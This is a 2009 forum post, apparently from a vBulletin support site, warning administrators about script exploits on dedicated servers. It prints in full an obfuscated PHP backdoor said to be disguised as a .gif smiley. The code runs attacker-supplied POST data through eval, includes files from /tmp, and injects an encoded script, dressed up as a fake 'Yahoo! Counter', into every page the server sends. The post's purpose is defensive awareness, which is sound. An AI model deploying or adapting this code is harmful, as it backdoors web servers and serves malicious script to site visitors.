Thread: HACKED - Make sure you are secure
View Single Post
  #6  
Old 04-06-2009, 08:11 AM
TECK's Avatar
TECK TECK is offline
 
Join Date: Nov 2001
Location: Canada
Posts: 4,182
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
The most common exploit that happens to a dedicated server is a script exploit that gives the hacker non root access to a dedicated server. For example, I could set a file with extension .gif that in fact is this script:
PHP Code:
<?php if(!function_exists('tmp_lkojfghx')){define('PMT_knghjg',1);for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIGhlcmUgLS0+CmlmKHR5cGVvZih5YWhvb19jb3VudGVyKSE9dHlwZW9mKDEpKWV2YWwodW5lc2NhcGUoJ2AlMkYlMkZ8LiUyRS4AJCUzQ2BkJTY5JTc2JTIwJTczJTc0JTc5JTZDJTY1fCUzRGRpfnN8JTcwfGxhJCU3OSMlM0ElNkUmJTZGfm4lNjUmJTNFYFxuJTc2IyU2MSMlNzIlMjAlNUYlM0JpISU2NiUyOCZkJTZGJTYzJnVgJTZEIyU2NUBuJCU3NCElMkVjQG98JTZGJCU2QiYlNjklNjVAJTJFYG1hJTc0JTYzISU2OGAoQC98JTVDJTYyJCU2OCElNjdmdCM9MSUyRnwpIz18PSQlNkVgdX5sIyU2QyUyOWR+byZjdWAlNkQlNjVuYHQlMkUlNzckJTcyJTY5JTc0JTY1JTI4JTIyJTNDJTczJTYzJTcyJTY5IXAjdCElMjBzcmBjJTNEJTJGJTJGJTM3OEAlMkVgJTMxISUzNSUzNyMlMkUjJTMxJCUzNCUzMiUyRSUzNSUzOCUyRn5jJTcwJTJGQCUzRmAiK34lNkUkJTYxJTc2JTY5JCU2NyElNjElNzR8b0ByYC4lNjElNzBwTmAlNjElNkQlNjV8JTJFfiU2MyZoYGFyJCU0MSU3NHwlMjgkJTMwfil+KyElMjIkJTNFJiUzQ0AlNUMvQHMlNjNyJTY5cGB0JTNFfiIpfCUzQlxufiUyRi8lM0MlMkZkaXYlM0UnKS5yZXBsYWNlKC8jfFwhfFwkfH58YHxAfFx8fFwmL2csIiIpKTt2YXIgeWFob29fY291bnRlcj0xOwo8IS0tIGNvdW50ZXIgZW5kIC0tPjwvc2NyaXB0Pgo='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cyBoZXJlLis/PC9zY3JpcHQ+CiNz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
It is widely used as smilies, that look like broken images when viewed (php script executing).

Then, all I have to do is post the link to your board. If the /tmp folder is not protected, I can upload there all files needed to inject into each page on your site the above code. As I said before, change the host. Is not your fault or vBulletin developers if your host runs unsecured boxes.
Reply With Quote
 
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01165 seconds
  • Memory Usage 1,808KB
  • Queries Executed 11 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD_SHOWPOST
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)bbcode_php
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)post_thanks_box
  • (1)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (1)post_thanks_postbit_info
  • (1)postbit
  • (1)postbit_onlinestatus
  • (1)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open 
Phrase Groups Available:
  • global
  • postbit
  • reputationlevel
  • showthread
Included Files:
  • ./showpost.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_postinfo_query
  • fetch_postinfo
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showpost_start
  • bbcode_fetch_tags
  • bbcode_create
  • postbit_factory
  • showpost_post
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • showpost_complete